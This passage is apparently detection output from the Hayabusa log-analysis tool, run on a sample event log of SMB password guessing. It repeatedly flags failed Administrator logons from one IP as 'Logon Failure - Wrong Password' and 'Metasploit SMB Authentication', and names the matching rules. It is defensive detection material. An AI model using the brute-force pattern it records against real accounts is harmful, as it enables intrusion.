SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:57.627 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: md4ioB8wNiaz2EKB : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:57.627 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:57.664 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: nM8QaFeqwDfJZ1gc : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:57.664 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:57.701 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: hlR75rMhpLnfQZbC : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:57.701 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:57.746 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong 
Password,User: Administrator : Type: 3 : Workstation: WF8BcOe4YUDYTXkj : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:57.746 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:57.786 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: FK0Iiao20PyPmtTk : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:57.786 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:57.832 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: kQbCbAHrQilFmMZP : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:57.832 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:57.866 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: VUdXQOw98VVoksDM : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:57.866 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:57.900 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: fISqpC8eKlaQGabv : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:57.900 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:57.936 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: s5Y0VryMAHjtB3n2 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:57.936 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:57.976 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: bsjAHlztFIC8tBt0 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:57.976 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit 
SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:58.012 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: CiEQlAlTOhqOKpmy : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:58.012 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:58.052 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: i7lUqZMROQXNUtQm : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:58.052 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:58.088 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 0eFCGEtOLzjUxI5v : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:58.088 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:58.128 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong 
Password,User: Administrator : Type: 3 : Workstation: CqfOAGcVcwSgaeo3 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:58.128 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:58.168 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 2hcqVJzkVgvUnebk : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:58.168 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:58.212 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Q9ZpqiTGXqJlAQTZ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:58.212 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:58.255 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: qCzXKlJ2vPeqqdfa : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:58.255 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:58.288 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: tITW0ihpErFk3nKp : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:58.288 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:58.344 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: MdQqr1T4frPNlulf : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:58.344 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:58.385 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: niiXRpP5AVHpG9Hu : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:58.385 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit 
SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:58.432 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: EThR98jZUdwNxbXQ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:58.432 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:58.465 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: NBsJcIw859FfEkLD : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:58.465 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:58.502 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: kG4Tv5vauSWhbj8F : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:58.502 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:58.543 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong 
Password,User: Administrator : Type: 3 : Workstation: 453tjgRGMu46vC33 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:58.543 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:58.580 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 1fnzhhfszxJWxLCT : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:58.580 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:58.608 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: dWPkeL8TnAbC1nSV : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:58.608 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:58.659 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: JrDmUzyK4Xxx6Jn1 : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:58.659 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:58.704 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: bMTf9D2yjumfS9LM : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:58.704 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:58.787 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 8cCs65ithseTCORa : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:58.787 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:58.823 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: QBrGAScjpAdScGmJ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:58.823 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit 
SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:58.864 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: n90F99qBpmUUVLId : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:58.864 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:58.912 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: MLeOkIG0hVHIOnN7 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:58.912 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:58.956 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: vVx5uUtkaFIf7PWZ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:58.956 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:58.993 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong 
Password,User: Administrator : Type: 3 : Workstation: kgd7lCQUQ3dHN18S : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:58.993 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:59.032 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: b8m2MmpFVK9Uojp7 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:59.032 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:59.071 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: F0NZjeu3lb5xddVQ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:59.071 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:59.112 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: YjjXBZnyWt0ljzpv : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:59.112 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:59.148 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: sinFBozyUR0sBadM : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:59.148 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:59.184 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Au22Y0LIuvTmZDpy : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:59.184 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:59.220 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: QDWW3VfZ7rKayV2v : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:59.220 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit 
SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:59.264 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: zPgaFDZtc5wEupnq : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:59.264 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:59.363 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: TpYZc2TTDfJFnPHo : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:59.363 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:59.434 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: rYKkl1iHImW9NwKv : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:59.434 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:59.489 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong 
Password,User: Administrator : Type: 3 : Workstation: KxA2dh1iUMaMWOkA : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:59.489 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:59.542 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: sCzEzW8jDZGGZcpd : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:59.542 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:59.589 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: p8510u5OsCVd94I5 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:59.589 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:59.628 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 2a0whHngnv7o1Bz2 : IP Address: 192.168.198.149 : AuthPackage: 
